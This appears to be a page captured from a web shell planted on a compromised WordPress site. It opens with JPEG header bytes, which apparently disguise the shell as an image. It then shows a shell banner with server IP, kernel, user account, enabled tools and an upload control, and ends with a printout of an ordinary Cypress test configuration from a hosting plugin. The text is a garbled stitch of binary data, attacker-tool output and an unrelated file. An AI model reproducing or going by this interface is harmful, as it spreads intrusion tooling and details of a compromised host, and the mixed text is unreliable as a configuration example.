????JFIF??x?x????'
Server IP : 104.21.112.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/dchsreunion.com/wp-content/plugins/wp-plugin-hostgator/ |
Upload File : |
const { defineConfig } = require('cypress') const cypressReplay = require("@replayio/cypress") const { phpVersion, core } = require('./.wp-env.json') const wpVersion = /[^/]*$/.exec(core)[0] module.exports = defineConfig({ projectId: "kuks2q", env: { wpUsername: 'admin', wpPassword: 'password', wpVersion, phpVersion, }, fixturesFolder: 'tests/cypress/fixtures', screenshotsFolder: 'tests/cypress/screenshots', video: true, videosFolder: 'tests/cypress/videos', videoUploadOnPasses: false, chromeWebSecurity: false, viewportWidth: 1024, viewportHeight: 768, blockHosts: [ '*doubleclick.net', '*jnn-pa.googleapis.com', '*youtube.com', ], e2e: { // We've imported your old cypress plugins here. // You may want to clean this up later by importing these. setupNodeEvents(on, config) { // Setup Replay cypressReplay.default(on, config); return require('./tests/cypress/plugins/index.js')(on, config) }, baseUrl: 'http://localhost:8880', specPattern: 'tests/cypress/integration/**/*.cy.{js,jsx,ts,tsx}', supportFile: 'tests/cypress/support/index.js', testIsolation: false, }, })